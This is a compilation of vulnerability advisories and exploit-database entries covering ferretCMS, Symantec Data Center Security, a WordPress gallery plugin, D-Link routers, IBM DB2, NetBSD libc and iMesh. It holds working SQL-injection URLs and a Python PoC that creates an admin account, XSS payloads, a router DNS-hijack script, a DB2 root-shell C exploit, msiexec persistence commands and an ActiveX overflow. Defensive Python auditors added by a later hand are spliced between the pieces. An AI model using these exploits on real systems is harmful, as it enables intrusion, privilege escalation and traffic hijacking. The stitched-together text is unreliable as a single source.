Stored XSS vulnerabilities reside in the logging functionality of
ferretCMS. In the administrative backend, the administrator can view
events stored in a log. One event that gets logged is a login attempt
to the administrative backend, where the username used is displayed,
too. An attacker can abuse this by trying to log in with JavaScript
code instead of a username. That code gets executed in the logs.
Login form is located here: http://{TARGET}/admin.php
XSS gets executed here: http://{TARGET}/admin.php?type=log&action=read
Another stored XSS vulnerability can be found in the pagetitle of a new
blog entry that is created by the administrator:
vulnerable form: http://{TARGET}/admin.php?type=page&action=insert&p=
XSS gets executed here: http://{TARGET}/admin.php?type=page&action=read
The following URLs are prone to SQL injection attacks:
http://{TARGET}/admin.php?type=site&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://{TARGET}/admin.php?type=customkey&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,4+--+
http://{TARGET}/admin.php?type=account&action=update&p=1+and+1=2+union+select+1,database%28%29,3,4,5,version%28%29,7,8,9+--+
http://{TARGET}/admin.php?type=plugin&action=update&p=1+and+1=2+union+select+1,database%28%29,version%28%29,4+--+
http://{TARGET}/admin.php?type=template&action=update&p=1+and+1=2+union+select+1,version%28%29,database%28%29,user%28%29,5+--+
http://{TARGET}/admin.php?type=permissiongroup&action=update&p=1+and+1=2+union+select+1,version%28%29,3,4+--+
http://{TARGET}/admin.php?type=page&action=update&p=1+and+substring%28version%28%29,1,1%29=5+--+
Last but not least there is a file-upload functionality in the
administrative backend of ferretCMS. The administrator can upload arbitrary
files here via the following URL:
http://localhost/ferretCMS/admin.php?type=uploader&action=upload
Any unauthenticated user can execute/read those files that had been
uploaded by visiting the following URL:
http://{TARGET}/custom/uploads/{NAME_OF_THE_UPLOADED_FILE}
=========
Solution:
=========
Vendor responded, issues will be patched eventually.
====================
Disclosure Timeline:
====================
15/16-Jan-2015 - found the vulnerability
16-Jan-2015 - informed the developers (see [3])
16-Jan-2015 - release date of this security advisory [without technical details]
21-Jan-2015 - attempt #2 to inform the developer via mail
22-Jan-2015 - vendor responded, technical details posted to Github (see [3])
22-Jan-2015 - release date of this security advisory
22-Jan-2015 - sent to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/JRogaishio/ferretCMS
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-10.html
[3] https://github.com/JRogaishio/ferretCMS/issues/63
[4] https://github.com/sroesemann/ferretCMS
SEC Consult Vulnerability Lab Security Advisory < 20150122-0 >
=======================================================================
title: Multiple critical vulnerabilities
products: Symantec Data Center Security: Server Advanced (SDCS:SA)
Symantec Critical System Protection (SCSP)
vulnerable version: see: Vulnerable / tested versions
fixed version: SCSP 5.2.9 MP6, SDCS:SA 6.0 MP1 - not all
vulnerabilities were fixed, but mitigations exist
impact: Critical
CVE number: CVE-2014-7289, CVE-2014-9224, CVE-2014-9225, CVE-2014-9226
homepage: http://www.symantec.com
found: 2014-09-19
by: Stefan Viehböck
SEC Consult Vulnerability Lab
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Symantec Data Center Security: Server Advanced v6.0 (DCS: Server Advanced)
extends the Data Center Security: Server solution beyond agentless threat
protections by incorporating technologies previous known as Critical System
Protection. Data Center Security: Server Advanced provides granular, policy-
based controls with a low impact in-guest agent to monitor and protect numerous
physical and virtual server environments. Through a combination of technologies
including application-centric controls including protected white listing,
sandboxing using least privilege access controls, host-based intrusion detection
(HIDS) and prevention (HIPS), and real-time file integrity monitoring (FIM),
organizations can proactively safeguard their heterogeneous server environments
and the information they contain from zero-day and targeted attacks, and fulfill
their compliance mandates across critical systems. Click here for more info"
Source:
http://www.symantec.com/connect/forums/announcing-data-center-security-server-server-advanced-products
Business recommendation:
------------------------
Attackers are able to completely compromise the SDCS:SA Server as they can gain
access at the system and database level. Furthermore attackers can manage all
clients and their policies.
SDCS:SA Server can be used as an entry point into the target infrastructure
(lateral movement, privilege escalation).
Furthermore the SDCS:SA Client protections can be bypassed in several ways.
It is highly recommended by SEC Consult not to use this software until a
thorough security review (SDCS:SA Server, SDCS:SA Client Policies) has been
performed by security professionals and all identified issues have been
resolved.
Note: SDCS:SA was replaced by SCSP. In this document the name SDCS:SA is used.
Vulnerability overview/description:
-----------------------------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
Due to insufficient input validation, the application allows the injection
of direct SQL commands. By exploiting the vulnerability, an attacker gains
access (read/write) to all records stored in the database as arbitrary SQL
statements can be executed.
Furthermore the application design enables an attacker to gain code execution
as SYSTEM (highest privilege Windows user) on the server by exploiting this
vulnerability.
No prior authentication is needed to exploit this vulnerability.
Affected script:
https://<host>:4443/sis-ui/authenticate
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
The application suffers from a reflected cross-site scripting vulnerability,
which allows an attacker to steal other users' sessions, to impersonate other
users and to gain unauthorized access to the admin interface.
Affected scripts:
https://<host>:8081/webui/Khaki_docs/SSO-Error.jsp
https://<host>:8081/webui/admin/WCUnsupportedClass.jsp
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
A script discloses internal information about the application on the server
without prior authentication. This information includes file paths on the
webserver and version information (OS, Java).
Affected script:
https://<host>:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
Several bypasses were discovered. These require Windows Administrator
permissions. This requirement is usually met in SDCS:SA deployments.
Note: SEC Consult did not check whether the mitigations provided by Symantec do
in fact sufficiently mitigate these vulnerabilities!
- Persistent code execution via Windows Services
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution.
- Remote code execution via RPC
The default Symantec policy rules can be bypassed in order to get persistent
arbitrary code execution. In addition to that "psexec-style" remote code
execution via SMB is possible as well.
- Policy bypass: Extraction of Windows passwords/hashes
The default Symantec policy rules do not prevent attackers from extracting
the Windows passwords/password hashes from the System.
- Privilege elevation via Windows Installer (msiexec.exe)
The restrictions imposed by the default policies can be bypassed entirely by
exploiting incorrect assumptions made in the policy regarding the Windows
Installer (msiexec.exe).
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
The restrictions imposed by default policies can be bypassed partially by
exploiting incorrect assumptions made in the policy regarding the Windows
Management Instrumentation. The policy does not take intended OS functionality
to execute code into account.
Proof of concept:
-----------------
1) Unauthenticated SQL Injection (SDCS:SA Server) (CVE-2014-7289)
The servlet accessible via /sis-ui/authenticate (TCP port 4443, HTTPS) is
vulnerable to SQL injection. By sending a specially crafted HTTP request,
arbitrary SQL statements can be executed.
In a proof of concept exploit, SQL statements to add a new SDCS:SA user with
admin privileges (username: secconsult, password: PASSWORD123!) were executed.
These statements are:
INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL,
ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME,
MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult',
'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=',
'', '', '', '', '', '', '', '', NULL, 'SECCONSULT', '2014-09-12 07:13:09',
'2014-09-12 07:13:23', '1', '0', '0',
'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto=');
INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1);
The code used to exploit the SQL injection vulnerability is listed below:
import httplib

def send_request(host,data):
    params = data
    headers = {"AppFire-Format-Version": "1.0",
               "AppFire-Charset": "UTF-16LE",
               "Content-Type":"application/x-appfire",
               "User-Agent":"Java/1.7.0_45",
              }
    conn = httplib.HTTPSConnection(host)
    conn.request("POST", "/sis-ui/authenticate", params, headers)
    response = conn.getresponse()
    data=response.read()
    conn.close()
    return response,data

header ="Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO USR (RID, USERNAME, PWD, CONTACT_NAME, PHONES, EMAIL, ALERT_EMAIL, ADDRESS, MANAGER_NAME, BUSINESS_INFO, PREF_LANGUAGE, FLAGS, DESCR, CREATETIME, MODTIME, ENABLED, BUILTIN, HIDDEN, SALT) VALUES (1504, 'secconsult', 'DUjDkNZgv9ys9/Sj/FQwYmP29JBtGy6ZvuZn2kAZxXc=', '', '', '', '', '', '', '', '', NULL, 'SV DESCRIPTION', '2014-09-12 07:13:09', '2014-09-12 07:13:23', '1', '0', '0', 'N1DSNcDdDb89eCIURLriEO2L/RwZXlRuWxyQ5pyGR/tfWt8wIrhSOipth8Fd/KWdsGierOx809rICjqrhiNqPGYTFyZ1Kuq32sNKcH4wxx+AGAUaWCtdII7ZXjOQafDaObASud25867mmEuxIa03cezJ0GC3AnwVNOErhqwTtto='); -- '' " # add user to USR table
#data ="ai=2\r\nha=example.com\r\nun=AAAAAAAAAAAAAA'; INSERT INTO ROLEMAP (USERRID, ROLERID) VALUES (1504, 1); -- " # add user to admin group
data+="\r\nan=Symantec Data Center Security Server 6.0\r\npwd=GBgYGBgYGBgYGBgYGBgYGBg=\r\nav=6.0.0.380\r\nhn=WIN-3EJQK7U0S3R\r\nsso=\r\n"
data = data.encode('utf-16le')
eof_flag="\nEOF_FLAG\n"
header = header %(len(data))
payload=header+data+eof_flag
response,data = send_request("<host>:4443",payload)
print data.decode('utf-16le')
print response.status
As the application users act as Tomcat administrators, an attacker can login
into the Tomcat manager as well. The Tomcat manager is available by default
via TCP port 8081 HTTPS.
The Tomcat Web Application Manager can be used to deploy new .war-files
containing attacker-controlled Java code. This allows an attacker to execute
arbitrary commands on the operating system with the permissions/user of the
"Symantec Data Center Security Server Manager" service (SISManager) which are
SYSTEM.
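As an added example (not part of the advisory or of Symantec's code), a Python 3 parser for the AppFire "properties" envelope that the PoC above constructs, followed by a detection rule over its fields that a server-side filter or log analyzer could apply. The envelope layout (plaintext header with Data-Length, UTF-16LE key=value body, trailing EOF_FLAG) is reconstructed from the PoC; the sample requests are constructed, and the meaning of fields other than un (username) and pwd is assumed.

```python
"""Parse the AppFire 'properties' login request consumed by /sis-ui/authenticate
and flag SQL metacharacters in its fields. Envelope layout reconstructed from
the PoC; sample traffic below is constructed for this example."""
import re

EOF_FLAG = b"\nEOF_FLAG\n"
HEADER_TEMPLATE = "Data-Format=text/plain\nData-Type=properties\nData-Length=%i\n\n"
# Quote and comment terminators, statement separators and DML keywords have no
# place in a login field; the PoC relies on exactly these to break out of the query.
SQLI_RE = re.compile(r"['\";]|--|/\*|\b(insert|select|union|update|delete|drop|exec)\b", re.I)


def build_request(props):
    """Encode a properties dict the way the PoC does (constructed helper used to
    produce sample traffic; a real sensor would receive the captured body)."""
    body = "".join("%s=%s\r\n" % (k, v) for k, v in props.items()).encode("utf-16le")
    return (HEADER_TEMPLATE % len(body)).encode("ascii") + body + EOF_FLAG


def parse_request(raw):
    """Return the properties dict from a raw request body.
    Raises ValueError on any envelope inconsistency so callers fail closed."""
    hdr_end = raw.find(b"\n\n")
    if hdr_end < 0:
        raise ValueError("missing header terminator")
    header = {}
    for line in raw[:hdr_end].decode("ascii", "strict").split("\n"):
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError("malformed header line: %r" % line)
        header[key] = value
    if header.get("Data-Type") != "properties":
        raise ValueError("unexpected Data-Type")
    length_str = header.get("Data-Length", "")
    if not length_str.isdigit():
        raise ValueError("missing or non-numeric Data-Length")
    length = int(length_str)
    body = raw[hdr_end + 2:hdr_end + 2 + length]
    trailer = raw[hdr_end + 2 + length:]
    if len(body) != length or trailer != EOF_FLAG:
        raise ValueError("Data-Length does not match body/EOF_FLAG")
    text = body.decode("utf-16le")  # UnicodeDecodeError is a ValueError
    props = {}
    for line in text.split("\r\n"):
        if not line:
            continue
        key, sep, value = line.partition("=")  # base64 values may contain '='
        if not sep:
            raise ValueError("malformed property: %r" % line)
        props[key] = value
    return props


def is_well_formed(raw):
    """True when the envelope parses; usable as a first-stage filter."""
    try:
        parse_request(raw)
        return True
    except ValueError:
        return False


def find_injection(props):
    """Return (field, first match) findings. The pwd field is never inspected
    or echoed, so findings can be logged without leaking credentials."""
    findings = []
    for key, value in props.items():
        if key == "pwd":
            continue
        match = SQLI_RE.search(value)
        if match:
            findings.append((key, match.group(0)))
    return findings
```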
2) Reflected Cross-Site-Scripting (XSS) (SDCS:SA Server) (CVE-2014-9224)
At least the following URLs are vulnerable to XSS:
https://example.com:8081/webui/Khaki_docs/SSO-Error.jsp?ErrorMsg=<script>alert('xss')</script>
https://example.com:8081/webui/admin/WCUnsupportedClass.jsp?classname=<script>alert('xss')</script>
3) Information Disclosure (SDCS:SA Server) (CVE-2014-9225)
The following URL discloses internal information:
https://example.com:8081/webui/admin/environment.jsp
4) Multiple Default Security Protection Policy Bypasses (SDCS:SA Client)
(CVE-2014-9226)
- Persistent code execution via Windows Services
Windows Service binaries can have file extensions other than ".exe". This
allows an attacker to execute arbitrary files and enables automatic execution
of malicious code at OS boot.
- Remote code execution via RPC
Existing tools like "psexec" or Metasploit (/exploit/windows/smb/psexec) can
be modified to write files not ending with ".exe" on the target system.
- Policy bypass: Extraction of Windows passwords/hashes
The tool "mimikatz" can be used to extract Windows credentials.
- Privilege elevation via Windows Installer (msiexec.exe)
msiexec.exe is trusted with "safe privileges" when started as a service (usually
the "Windows Installer" service, parameter "/V"). This can be abused by creating
a service that starts msiexec.exe with the parameters "/quiet", "/i" and a path
to a valid .msi file. Upon service start the .msi file is executed with "safe
privileges" and is not subject to any SDCS:SA Client checks.
sc create evil_service binpath= "c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi" type= own start= auto error= ignore
net start evil_service
- Privilege elevation/code execution via Windows Management Instrumentation
(.mof files)
On old Windows versions .mof files placed in "%SystemRoot%\System32\wbem\mof\"
are automatically compiled/executed. These trigger arbitrary code execution.
The code is executed with "def_winsvcs_ps" permissions.
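Added example (not from the advisory or from Symantec): a Python audit of Windows service definitions that flags the two service-based bypasses described above, a service image whose file name does not end in .exe and msiexec.exe registered as a service with an install switch. The records are constructed sample data in the shape `sc qc` reports as BINARY_PATH_NAME; every service name other than evil_service is an assumption.

```python
"""Flag service definitions matching the policy bypasses above:
non-.exe service images and msiexec.exe run as a service with /i.
Sample records are constructed for this example."""
import ntpath
import re

EXT_RE = re.compile(r"\.[A-Za-z0-9]{1,4}$")


def split_image_path(binpath):
    """Return (image, arguments) from a service binary path.
    A quoted image is taken verbatim; an unquoted one is grown token by token
    until a token carries a file extension, which mirrors how Windows resolves
    unquoted paths containing spaces (heuristic: Windows probes the filesystem,
    this code does not, so a directory name with a dot can mislead it)."""
    binpath = binpath.strip()
    if binpath.startswith('"'):
        end = binpath.find('"', 1)
        if end < 0:
            raise ValueError("unterminated quote in %r" % binpath)
        return binpath[1:end], binpath[end + 1:].strip()
    tokens = binpath.split(" ")
    for i in range(1, len(tokens) + 1):
        candidate = " ".join(tokens[:i])
        if EXT_RE.search(candidate):
            return candidate, " ".join(tokens[i:]).strip()
    return binpath, ""


def audit_service(name, binpath):
    """Return finding strings for one service (empty list when clean)."""
    image, args = split_image_path(binpath)
    base = ntpath.basename(image).lower()
    ext = ntpath.splitext(base)[1]
    findings = []
    if ext != ".exe":
        # The default policy keyed on ".exe"; any other extension sidesteps it.
        findings.append("%s: service image %r does not end in .exe" % (name, image))
    if base == "msiexec.exe":
        # The legitimate Windows Installer service runs msiexec.exe /V; an
        # install switch means a package runs with the service's privileges.
        switches = {t.lower() for t in args.split()}
        if "/i" in switches or "/package" in switches:
            findings.append("%s: msiexec.exe registered as a service to install "
                            "a package (%s)" % (name, args))
    return findings


def audit_services(records):
    """Audit (name, BINARY_PATH_NAME) pairs and return all findings in order."""
    out = []
    for name, binpath in records:
        out.extend(audit_service(name, binpath))
    return out


SAMPLE_SERVICES = [  # constructed sample records
    ("msiserver", r"C:\Windows\system32\msiexec.exe /V"),
    ("Dnscache", r"C:\Windows\system32\svchost.exe -k NetworkService"),
    ("evil_service", r"c:\windows\System32\msiexec.exe /quiet /i c:\temp\evil_msi"),
    ("updater", r'"C:\Program Files\Vendor\updater.dat" -svc'),
    ("legacy", r"C:\Program Files\Vendor Tools\agent.exe --service"),
]

if __name__ == "__main__":
    for finding in audit_services(SAMPLE_SERVICES):
        print(finding)
```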
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in Symantec Data Center
Security: Server Advanced version 6.0, which was the most recent version at
the time of discovery.
However other versions (SCSP 5.2.9) are affected by the vulnerabilities as
well. See the vendor information in the Solution section.
Vendor contact timeline:
------------------------
2014-10-20: Sending advisory and proof of concept exploit via encrypted
channel.
2014-10-20: Vendor acknowledges receipt of advisory.
2014-11-18: Requesting status update.
2014-11-18: Vendor responds and informs about an advisory in December,
version containing fixes in February.
2014-12-04: Vendor informs about delays in releasing fixes/mitigations,
target release date mid-January.
2015-01-08: Vendor confirms release date for fixes/mitigations (2015-01-17).
2015-01-17: Vendor releases fixes for SCSP.
2015-01-19: Vendor releases advisory and mitigations for SCSP/
2015-01-22: SEC Consult releases coordinated security advisory.
Solution:
---------
Update to the most recent version of SCSP (5.2.9 MP6) or SDCS:SA (6.0 MP1).
Not all vulnerabilities are fixed by this update! However, Symantec has
provided mitigations for these issues:
More information can be found at:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20150119_00
http://www.symantec.com/business/support/index?page=content&id=TECH227679
http://www.symantec.com/business/support/index?page=content&id=HOWTO100996&actp=search&viewlocale=en_US&searchid=1421349750071
Workaround:
-----------
See solution.
Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich
Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone: +43 1 8903043 0
Fax: +43 1 8903043 15
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com
EOF Stefan Viehböck / @2015
# Exploit Title: Photo Gallery 1.2.5 Unrestricted File Upload
# Date: 11-11-2014
# Software Link: https://wordpress.org/plugins/photo-gallery/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# CVE: CVE-2014-9312
# Category: webapps
1. Description
Every registered user (even a Subscriber) can reach the upload functionality because the access check inside UploadHandler.php only requires the "read" capability, which every role has.
http://security.szurek.pl/photo-gallery-125-unrestricted-file-upload.html
2. Proof of Concept
Login as regular user (created using wp-login.php?action=register).
Pack .php files into .zip archive then send it using:
<form method="post" action="http://wordpress-install/wp-admin/admin-ajax.php?action=bwg_UploadHandler&dir=rce/" enctype="multipart/form-data">
    <input type="file" name="files">
    <input type="submit" value="Hack!">
</form>
Your files will be visible inside:
http://wordpress-install/wp-admin/rce/
3. Solution:
Update to version 1.2.6
https://downloads.wordpress.org/plugin/photo-gallery.1.2.6.zip
#!/bin/bash
#
# D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit
#
# Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>
# http://www.ethical-hacker.org/
#
# Description:
# Different D-Link Routers are vulnerable to DNS change.
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# ACCORDING TO THE VULNERABILITY DISCOVERER, MORE D-Link
# DEVICES MAY BE AFFECTED.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
    echo " D-Link DSL-2740R Unauthenticated Remote DNS Change Exploit"
    echo " ================================================================"
    echo " Usage: $0 <Target> <Preferred DNS> <Alternate DNS>"
    echo " Example: $0 192.168.1.1 8.8.8.8"
    echo " Example: $0 192.168.1.1 8.8.8.8 8.8.4.4"
    echo ""
    echo " Copyright 2015 (c) Todor Donev <todor.donev at gmail.com>"
    echo " http://www.ethical-hacker.org/"
    exit;
fi
# GET is the lwp-request client shipped with libwww-perl
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
    echo " Error : libwww-perl not found =/"
    exit;
fi
# Unauthenticated form handler; output is discarded
GET "http://$1/Forms/dns_1?Enable_DNSFollowing=1&dnsPrimary=$2&dnsSecondary=$3" &> /dev/null
// source: https://www.securityfocus.com/bid/48514/info
IBM DB2 is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Successfully exploiting this issue will result in a complete compromise of the affected system.
IBM DB2 9.7 is vulnerable; other versions may also be affected.
/*
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of the Nth Dimension nor the names of its contributors may
be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
(c) Tim Brown, 2011
<mailto:timb@nth-dimension.org.uk>
<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
PoC exploit for IBM DB2 DT_RPATH privesc.
*/
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv) {
    FILE *badlibkbbsrchandle;
    int pwnedflag;

    printf("PoC exploit for IBM DB2 DT_RPATH privesc.\r\n");
    printf("(c) Tim Brown, 2011\r\n");
    printf("<mailto:timb@nth-dimension.org.uk>\r\n");
    printf("<http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>\r\n");
    /* Write the source of a shared object whose constructor runs as soon as it is loaded */
    printf("Constructing bad_libkbb.so...\r\n");
    badlibkbbsrchandle = fopen("bad_libkbb.c", "w");
    fprintf(badlibkbbsrchandle, "#include <stdio.h>\r\n");
    fprintf(badlibkbbsrchandle, "#include <unistd.h>\r\n");
    fprintf(badlibkbbsrchandle, "#include <stdlib.h>\r\n");
    fprintf(badlibkbbsrchandle, "\r\n");
    fprintf(badlibkbbsrchandle, "void __attribute__ ((constructor)) bad_libkbb(void) {\r\n");
    fprintf(badlibkbbsrchandle, "    printf(\"Have a root shell...\\r\\n\");\r\n");
    fprintf(badlibkbbsrchandle, "    setuid(geteuid());\r\n");
    fprintf(badlibkbbsrchandle, "    system(\"/usr/bin/id\");\r\n");
    fprintf(badlibkbbsrchandle, "    system(\"/bin/sh\");\r\n");
    fprintf(badlibkbbsrchandle, "    exit(0);\r\n");
    fprintf(badlibkbbsrchandle, "}\r\n");
    fclose(badlibkbbsrchandle);
    /* Build it under the library name the target resolves through its DT_RPATH */
    system("gcc -shared -fPIC -o libkbb.so bad_libkbb.c");
    /* Run the privileged binary so that it loads libkbb.so */
    system("/opt/ibm/db2/V9.7/itma/tmaitm6/lx8266/bin/kbbacf1");
    exit(0);
}
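Added example (not from the advisory or from IBM): a Python helper that parses `readelf -d` output and classifies every DT_RPATH/DT_RUNPATH component of a privileged binary, which is the check an auditor would run to find this class of issue before deployment. That the affected binary searched a relative path is inferred from the PoC (it builds libkbb.so in the working directory and then runs kbbacf1); the readelf output and the paths in the sample are constructed.

```python
"""Classify DT_RPATH / DT_RUNPATH components of a setuid/setgid binary from
`readelf -d` output. Sample output below is constructed for this example."""
import re

DYN_RE = re.compile(r"\((RPATH|RUNPATH)\)\s+Library r(?:un)?path: \[(.*)\]")
WORLD_WRITABLE_PREFIXES = ("/tmp", "/var/tmp", "/dev/shm")


def parse_search_paths(readelf_output):
    """Return [(tag, [component, ...]), ...] for every RPATH/RUNPATH line."""
    result = []
    for line in readelf_output.splitlines():
        match = DYN_RE.search(line)
        if match:
            result.append((match.group(1), match.group(2).split(":")))
    return result


def classify(component):
    """Severity of one search-path component when the binary runs privileged."""
    if component in ("", "."):
        return "critical"  # empty or '.' means the caller's working directory is searched
    if component.startswith("$ORIGIN") or component.startswith("${ORIGIN}"):
        return "review"    # safe only if the binary's own directory is not user-writable
    if not component.startswith("/"):
        return "critical"  # any other relative path is resolved against the cwd
    if any(component == p or component.startswith(p + "/") for p in WORLD_WRITABLE_PREFIXES):
        return "critical"  # absolute, but under a world-writable tree
    return "ok"


def audit(readelf_output):
    """Return (tag, component, severity) for every component that is not 'ok'."""
    findings = []
    for tag, components in parse_search_paths(readelf_output):
        for component in components:
            severity = classify(component)
            if severity != "ok":
                findings.append((tag, component, severity))
    return findings


SAMPLE_READELF = """\
Dynamic section at offset 0x1d8 contains 25 entries:
  Tag        Type                         Name/Value
 0x0000000000000001 (NEEDED)             Shared library: [libkbb.so]
 0x0000000000000001 (NEEDED)             Shared library: [libc.so.6]
 0x000000000000000f (RPATH)              Library rpath: [/opt/vendor/lib:.:lib]
 0x000000000000001d (RUNPATH)            Library runpath: [$ORIGIN/../lib]
 0x000000000000000c (INIT)               0x1000
"""

if __name__ == "__main__":
    for tag, component, severity in audit(SAMPLE_READELF):
        print("%-8s %-16s %s" % (severity, tag, component))
```

On a real system feed it the output of `readelf -d <binary>` for each setuid/setgid executable (for example the output of `find / -perm -4000 -type f`).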
// source: https://www.securityfocus.com/bid/48528/info
NetBSD is prone to a stack-based buffer-overflow vulnerability affecting multiple functions in the 'libc/net' library.
Successful exploits may allow an attacker to execute arbitrary code in the context of the application using the affected library. Failed exploit attempts will result in a denial-of-service condition.
/*
127# gcc -o grr grr.c && ./grr 6050
127# gcc -o grr grr.c && ./grr 6051
Memory fault (core dumped)
127#
*/
#include <stdlib.h>
#include <string.h>
#include <netdb.h>

int main(int argc, char *argv[]){
    char *cycek;
    /* allocate a service name of the requested length and fill it with 'A' */
    cycek=malloc(atoi(argv[1]));
    if(!cycek) return 1;
    memset(cycek,'A',atoi(argv[1]));
    /* an over-long name overflows a fixed-size stack buffer in libc/net */
    getservbyname(cycek,"tcp");
    return 0;
}
source: https://www.securityfocus.com/bid/48550/info
iMesh is prone to a buffer overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied data.
Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using an affected ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
iMesh 10.0 is vulnerable; other versions may also be affected.
<!--
###
# Title : iMesh <= 10.0 (IMWebControl.dll) Remote Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans
# platform : windows
# Impact : Remote Buffer Overflow & DLL Hijacked
##
# <3 Liyan Oz + All UE-Team & I.BackTrack Team <3
###
-->
<?XML version='1.0' standalone='yes' ?>
<package>
<job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B97' id='target'/>
<script language='vbscript'>
'Wscript.echo typename(target)
targetFile = "C:\Program Files\iMesh Applications\iMesh\IMWebControl.dll"
prototype = "ProcessRequestEx ( ByVal sourceName As String , ByVal destName As String , ByVal bFailIfExists As Long )"
memberName = "ProcessRequestEx"
progid = "target.IMWebControl"
buf=String(31337, "A") ' Buffer Overflow
puf=218959117 'set ecx to 0x0d0d0d0d
target.SetHandler puf
target.ProcessRequestEx buf ,puf ' Bo0M !
</script>
</job>
</package>
<!--
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > ++ Liyan Oz & Blackrootkit ..all
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
